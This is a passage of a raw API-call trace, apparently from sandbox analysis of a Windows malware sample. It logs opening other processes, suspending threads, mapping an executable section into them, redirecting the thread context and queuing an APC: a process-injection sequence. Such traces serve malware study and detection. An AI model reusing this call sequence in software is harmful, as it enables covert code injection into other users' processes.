[305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0141.366] NtQueueApcThread (ThreadHandle=0x100, ApcRoutine=0x257adc2, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0141.385] NtResumeThread (in: ThreadHandle=0x100, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0141.385] NtClose (Handle=0x104) returned 0x0 [0141.385] NtClose (Handle=0x100) returned 0x0 [0141.394] PostThreadMessageW (idThread=0x45c, Msg=0x111, wParam=0x0, lParam=0x0) returned 0 [0141.854] PostThreadMessageW (idThread=0x45c, Msg=0x8003, wParam=0x19e6d5, lParam=0x0) returned 0 [0141.860] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x694, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x100) returned 0x0 [0141.860] NtQueryInformationProcess (in: ProcessHandle=0x100, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0141.860] NtQueryInformationProcess (in: ProcessHandle=0x100, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0141.864] NtReadVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0141.864] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0147.870] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x3a4) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0147.876] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0147.876] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x100, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x5960000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0148.238] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x2, Ebx=0x52e65c, Edx=0x0, Ecx=0x0, Eax=0x48, Ebp=0x52e6a8, Eip=0x778e014d, SegCs=0x23, EFlags=0x246, Esp=0x52e60c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0148.238] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0148.239] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0xe3200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0xb50000, SectionOffset=0x0, ViewSize=0x19e6b0*=0xe4000) returned 0x0 [0148.246] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x100, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0xe3200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x27f0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0xe4000) returned 0x0 [0148.271] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xb50000) returned 0x0 [0148.276] NtClose (Handle=0x108) returned 0x0 [0148.294] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x2, Ebx=0x52e65c, Edx=0x0, Ecx=0x0, Eax=0x48, Ebp=0x52e6a8, Eip=0x2840707, SegCs=0x23, EFlags=0x246, Esp=0x52e60c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0148.303] NtQueueApcThread (ThreadHandle=0x104, ApcRoutine=0x284070c, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0148.308] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0148.309] NtClose (Handle=0x100) returned 0x0 [0148.309] NtClose (Handle=0x104) returned 0x0 [0148.312] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x81c, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0148.312] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0148.312] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0148.312] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0148.312] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0153.305] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x820) | out: ThreadHandle=0x19ea68*=0x100) returned 0x0 [0153.305] NtSuspendThread (in: ThreadHandle=0x100, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0153.305] 